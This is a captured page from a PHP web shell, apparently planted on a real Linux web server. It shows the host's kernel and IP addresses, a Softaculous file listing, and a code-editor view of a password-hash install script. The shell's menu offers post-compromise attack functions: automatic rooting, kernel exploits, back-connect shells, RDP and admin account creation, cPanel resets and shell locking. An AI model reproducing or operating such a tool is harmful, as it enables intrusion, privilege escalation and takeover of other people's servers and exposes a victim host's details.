Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.119.123.10
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
procwire /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.htaccess
254
B
-rw-r--r--
NOTES.txt
1.09
KB
-rw-r--r--
clone.php
4.91
KB
-rw-r--r--
config.php
3.61
KB
-rw-r--r--
edit.php
6.12
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
132
B
-rw-r--r--
import.php
3.77
KB
-rw-r--r--
info.xml
7.16
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
9.92
KB
-rw-r--r--
install.xml
1.04
KB
-rw-r--r--
md5
6.74
KB
-rw-r--r--
update_pass.php
1.03
KB
-rw-r--r--
upgrade.php
4.35
KB
-rw-r--r--
upgrade.xml
1.48
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update_pass.php
<?php $salt_config = md5(mt_rand() . microtime(true)); echo $salt_db = '$2y$11$'.__randomBase64String(22); echo '<SOFTACULOUS>'; echo $pass = substr(crypt('[[admin_pass]]' . '[[salt_config]]', $salt_db), 29); function __randomBase64String($requiredLength = 22) { $buffer = ''; $rawLength = (int) ($requiredLength * 3 / 4 + 1); $valid = false; if(function_exists('mcrypt_create_iv')) { $buffer = mcrypt_create_iv($rawLength, MCRYPT_DEV_URANDOM); if($buffer) $valid = true; } if(!$valid && function_exists('openssl_random_pseudo_bytes')) { $buffer = openssl_random_pseudo_bytes($rawLength); if($buffer) $valid = true; } if(!$valid || strlen($buffer) < $rawLength) { $bl = strlen($buffer); for($i = 0; $i < $rawLength; $i++) { if($i < $bl) { $buffer[$i] = $buffer[$i] ^ chr(mt_rand(0, 255)); } else { $buffer .= chr(mt_rand(0, 255)); } } } $salt = str_replace('+', '.', base64_encode($buffer)); $salt = substr($salt, 0, $requiredLength); $salt .= $valid; return $salt; } @unlink('update_pass.php'); ?>
Close